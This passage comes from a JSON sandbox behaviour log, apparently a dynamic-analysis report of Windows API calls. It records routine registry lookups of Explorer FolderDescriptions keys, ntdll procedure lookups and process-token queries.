                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}\\FolderTypeID"
              }
            ],
            "repeated": 0,
            "id": 566
          },
          {
            "timestamp": "2025-11-20 10:58:26,172",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000298"
              },
              {
                "name": "ValueName",
                "value": "InitFolderHandler"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}\\InitFolderHandler"
              }
            ],
            "repeated": 0,
            "id": 567
          },
          {
            "timestamp": "2025-11-20 10:58:26,172",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "registry",
            "api": "RegOpenKeyExW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Registry",
                "value": "0x00000298"
              },
              {
                "name": "SubKey",
                "value": "PropertyBag"
              },
              {
                "name": "Handle",
                "value": "0x000002a0"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}\\PropertyBag"
              }
            ],
            "repeated": 0,
            "id": 568
          },
          {
            "timestamp": "2025-11-20 10:58:26,172",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "registry",
            "api": "RegCloseKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000298"
              }
            ],
            "repeated": 0,
            "id": 569
          },
          {
            "timestamp": "2025-11-20 10:58:26,172",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "system",
            "api": "LdrGetDllHandle",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileName",
                "value": "ntdll.dll"
              },
              {
                "name": "ModuleHandle",
                "value": "0x7ffee3470000"
              }
            ],
            "repeated": 0,
            "id": 570
          },
          {
            "timestamp": "2025-11-20 10:58:26,172",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "system",
            "api": "LdrGetProcedureAddress",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ModuleName",
                "value": "ntdll.dll"
              },
              {
                "name": "ModuleHandle",
                "value": "0x7ffee3470000"
              },
              {
                "name": "FunctionName",
                "value": "RtlWow64GetCurrentMachine"
              },
              {
                "name": "Ordinal",
                "value": "0"
              },
              {
                "name": "FunctionAddress",
                "value": "0x7ffee34c0d90"
              }
            ],
            "repeated": 0,
            "id": 571
          },
          {
            "timestamp": "2025-11-20 10:58:26,172",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "system",
            "api": "LdrGetProcedureAddress",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ModuleName",
                "value": "ntdll.dll"
              },
              {
                "name": "ModuleHandle",
                "value": "0x7ffee3470000"
              },
              {
                "name": "FunctionName",
                "value": "RtlWow64IsWowGuestMachineSupported"
              },
              {
                "name": "Ordinal",
                "value": "0"
              },
              {
                "name": "FunctionAddress",
                "value": "0x7ffee34ec670"
              }
            ],
            "repeated": 0,
            "id": 572
          },
          {
            "timestamp": "2025-11-20 10:58:26,172",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "system",
            "api": "NtClose",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000290"
              }
            ],
            "repeated": 0,
            "id": 573
          },
          {
            "timestamp": "2025-11-20 10:58:26,172",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "process",
            "api": "NtOpenProcessToken",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "DesiredAccess",
                "value": "0x00000008"
              },
              {
                "name": "TokenHandle",
                "value": "0x00000290"
              }
            ],
            "repeated": 0,
            "id": 574
          },
          {
            "timestamp": "2025-11-20 10:58:26,172",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "process",
            "api": "NtQueryInformationToken",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "TokenInformationClass",
                "value": "29"
              },
              {
                "name": "TokenInformation",
                "value": "\\x00\\x00\\x00\\x00"
              }
            ],
            "repeated": 0,
            "id": 575
          },
          {
            "timestamp": "2025-11-20 10:58:26,172",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "process",
            "api": "NtQueryInformationToken",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "TokenInformationClass",
                "value": "25"
              },
              {
                "name": "TokenInformation",
                "value": "p\\xc0\\x7f\\x00\\x00\\x00\\x00\\x00`\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x01\\x00\\x00\\x00\\x00\\x00\\x10\\x000\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00"
              }
            ],
            "repeated": 0,
            "id": 576
          },
          {
            "timestamp": "2025-11-20 10:58:26,172",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "registry",
            "api": "RegOpenKeyExW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Registry",
                "value": "0x80000002",
                "pretty_value": "HKEY_LOCAL_MACHINE"
              },
              {
                "name": "SubKey",
                "value": "Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions"
              },
              {
                "name": "Handle",
                "value": "0x00000298"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions"
              }
            ],
            "repeated": 0,
            "id": 577
          },
          {
            "timestamp": "2025-11-20 10:58:26,172",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "registry",
            "api": "RegOpenKeyExW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Registry",
                "value": "0x00000298"
              },
              {
                "name": "SubKey",
                "value": "{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}"
              },
              {
                "name": "Handle",
                "value": "0x000002a4"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}"
              }
            ],
            "repeated": 0,
            "id": 578
          },
          {
            "timestamp": "2025-11-20 10:58:26,172",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "registry",
            "api": "RegCloseKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000298"
              }
            ],
            "repeated": 0,
            "id": 579
          },
          {
            "timestamp": "2025-11-20 10:58:26,172",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x000002a4"
              },
              {
                "name": "ValueName",
                "value": "Category"
              },
              {
                "name": "Data",
                "value": "2"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\\Category"
              }
            ],
            "repeated": 0,
            "id": 580
          },
          {
            "timestamp": "2025-11-20 10:58:26,172",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x000002a4"
              },
              {
                "name": "ValueName",
                "value": "Name"
              },
              {
                "name": "Data",
                "value": "System"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\\Name"
              }
            ],
            "repeated": 0,
            "id": 581
          },
          {
            "timestamp": "2025-11-20 10:58:26,172",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x000002a4"
              },
              {
                "name": "ValueName",
                "value": "ParentFolder"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\\ParentFolder"
              }
            ],
            "repeated": 0,
            "id": 582
          },
          {
            "timestamp": "2025-11-20 10:58:26,172",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x000002a4"
              },
              {
                "name": "ValueName",
                "value": "Description"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\\Description"
              }
            ],
            "repeated": 0,
            "id": 583
          },
          {
            "timestamp": "2025-11-20 10:58:26,172",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x000002a4"
              },
              {
                "name": "ValueName",
                "value": "RelativePath"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\\RelativePath"
              }
            ],
            "repeated": 0,
            "id": 584
          },
          {
            "timestamp": "2025-11-20 10:58:26,172",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x000002a4"
              },
              {
                "name": "ValueName",
                "value": "ParsingName"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\\ParsingName"
              }
            ],
            "repeated": 0,
            "id": 585
          },
          {
            "timestamp": "2025-11-20 10:58:26,172",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x000002a4"
              },
              {
                "name": "ValueName",
                "value": "InfoTip"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\\InfoTip"
              }
            ],
            "repeated": 0,
            "id": 586
          },
          {
            "timestamp": "2025-11-20 10:58:26,172",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x000002a4"
              },
              {
                "name": "ValueName",
                "value": "LocalizedName"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\\LocalizedName"
              }
            ],
            "repeated": 0,
            "id": 587
          },
          {
            "timestamp": "2025-11-20 10:58:26,172",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x000002a4"
              },
              {
                "name": "ValueName",
                "value": "Icon"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\\Icon"
              }
            ],
            "repeated": 0,
            "id": 588
          },
          {
            "timestamp": "2025-11-20 10:58:26,172",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x000002a4"
              },
              {
                "name": "ValueName",
                "value": "Security"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\\Security"
              }
            ],
            "repeated": 0,
            "id": 589
          },
          {
            "timestamp": "2025-11-20 10:58:26,172",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x000002a4"
              },
              {
                "name": "ValueName",
                "value": "StreamResource"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\\StreamResource"
              }
            ],
            "repeated": 0,
            "id": 590
          },
          {
            "timestamp": "2025-11-20 10:58:26,172",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x000002a4"
              },
              {
                "name": "ValueName",
                "value": "StreamResourceType"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\\StreamResourceType"
              }
            ],
            "repeated": 0,
            "id": 591
          },
          {
            "timestamp": "2025-11-20 10:58:26,172",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x000002a4"
              },
              {
                "name": "ValueName",
                "value": "LocalRedirectOnly"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\\LocalRedirectOnly"
              }
            ],
            "repeated": 0,
            "id": 592
          },
          {
            "timestamp": "2025-11-20 10:58:26,172",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x000002a4"
              },
              {
                "name": "ValueName",
                "value": "Roamable"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\\Roamable"
              }
            ],
            "repeated": 0,
            "id": 593
          },
          {
            "timestamp": "2025-11-20 10:58:26,172",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x000002a4"
              },
              {
                "name": "ValueName",
                "value": "PreCreate"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\\PreCreate"
              }
            ],
            "repeated": 0,
            "id": 594
          },
          {
            "timestamp": "2025-11-20 10:58:26,172",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x000002a4"
              },
              {
                "name": "ValueName",
                "value": "Stream"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\\Stream"
              }
            ],
            "repeated": 0,
            "id": 595
          },
          {
            "timestamp": "2025-11-20 10:58:26,172",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x000002a4"
              },
              {
                "name": "ValueName",
                "value": "PublishExpandedPath"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\\PublishExpandedPath"
              }
            ],
            "repeated": 0,
            "id": 596
          },
          {
            "timestamp": "2025-11-20 10:58:26,172",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x000002a4"
              },
              {
                "name": "ValueName",
                "value": "DefinitionFlags"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\\DefinitionFlags"
              }
            ],
            "repeated": 0,
            "id": 597
          },
          {
            "timestamp": "2025-11-20 10:58:26,172",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x000002a4"
              },
              {
                "name": "ValueName",
                "value": "Attributes"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\\Attributes"
              }
            ],
            "repeated": 0,
            "id": 598
          },
          {
            "timestamp": "2025-11-20 10:58:26,172",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x000002a4"
              },
              {
                "name": "ValueName",
                "value": "FolderTypeID"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\\FolderTypeID"
              }
            ],
            "repeated": 0,
            "id": 599
          },
          {
            "timestamp": "2025-11-20 10:58:26,172",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x000002a4"
              },
              {
                "name": "ValueName",
                "value": "InitFolderHandler"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\\InitFolderHandler"
              }
            ],
            "repeated": 0,
            "id": 600
          },
          {
            "timestamp": "2025-11-20 10:58:26,172",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "registry",
            "api": "RegOpenKeyExW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Registry",
                "value": "0x000002a4"
              },
              {
                "name": "SubKey",
                "value": "PropertyBag"
              },
              {
                "name": "Handle",
                "value": "0x00000298"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\\PropertyBag"
              }
            ],
            "repeated": 0,
            "id": 601
          },
          {
            "timestamp": "2025-11-20 10:58:26,172",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "registry",
            "api": "RegCloseKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x000002a4"
              }
            ],
            "repeated": 0,
            "id": 602
          },
          {
            "timestamp": "2025-11-20 10:58:26,172",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "system",
            "api": "NtClose",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000290"
              }
            ],
            "repeated": 0,
            "id": 603
          },
          {
            "timestamp": "2025-11-20 10:58:26,172",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "process",
            "api": "NtOpenProcessToken",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "DesiredAccess",
                "value": "0x00000008"
              },
              {
                "name": "TokenHandle",
                "value": "0x00000290"
              }
            ],
            "repeated": 0,
            "id": 604
          },
          {
            "timestamp": "2025-11-20 10:58:26,172",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "process",
            "api": "NtQueryInformationToken",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "TokenInformationClass",
                "value": "29"
              },
              {
                "name": "TokenInformation",
                "value": "\\x00\\x00\\x00\\x00"
              }
            ],
            "repeated": 0,
            "id": 605
          },
          {
            "timestamp": "2025-11-20 10:58:26,172",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "process",
            "api": "NtQueryInformationToken",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "TokenInformationClass",
                "value": "25"
              },
              {
                "name": "TokenInformation",
                "value": "p\\xc0\\x7f\\x00\\x00\\x00\\x00\\x00`\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x01\\x00\\x00\\x00\\x00\\x00\\x10\\x000\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00"
              }
            ],
            "repeated": 0,
            "id": 606
          },
          {
            "timestamp": "2025-11-20 10:58:26,172",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "registry",
            "api": "RegOpenKeyExW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Registry",
                "value": "0x80000002",
                "pretty_value": "HKEY_LOCAL_MACHINE"
              },
              {
                "name": "SubKey",
                "value": "Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions"
              },
              {
                "name": "Handle",
                "value": "0x000002a4"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions"
              }
            ],
            "repeated": 0,
            "id": 607
          },
          {
            "timestamp": "2025-11-20 10:58:26,172",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "registry",
            "api": "RegOpenKeyExW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Registry",
                "value": "0x000002a4"
              },
              {
                "name": "SubKey",
                "value": "{F38BF404-1D43-42F2-9305-67DE0B28FC23}"
              },
              {
                "name": "Handle",
                "value": "0x000002a8"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}"
              }
            ],
            "repeated": 0,
            "id": 608
          },
          {
            "timestamp": "2025-11-20 10:58:26,172",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "registry",
            "api": "RegCloseKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x000002a4"
              }
            ],
            "repeated": 0,
            "id": 609
          },
          {
            "timestamp": "2025-11-20 10:58:26,172",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x000002a8"
              },
              {
                "name": "ValueName",
                "value": "Category"
              },
              {
                "name": "Data",
                "value": "2"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\Category"
              }
            ],
            "repeated": 0,
            "id": 610
          },
          {
            "timestamp": "2025-11-20 10:58:26,172",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x000002a8"
              },
              {
                "name": "ValueName",
                "value": "Name"
              },
              {
                "name": "Data",
                "value": "Windows"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\Name"
              }
            ],
            "repeated": 0,
            "id": 611
          },
          {
            "timestamp": "2025-11-20 10:58:26,172",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x000002a8"
              },
              {
                "name": "ValueName",
                "value": "ParentFolder"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\ParentFolder"
              }
            ],
            "repeated": 0,
            "id": 612
          },
          {
            "timestamp": "2025-11-20 10:58:26,172",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x000002a8"
              },
              {
                "name": "ValueName",
                "value": "Description"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\Description"
              }
            ],
            "repeated": 0,
            "id": 613
          },
          {
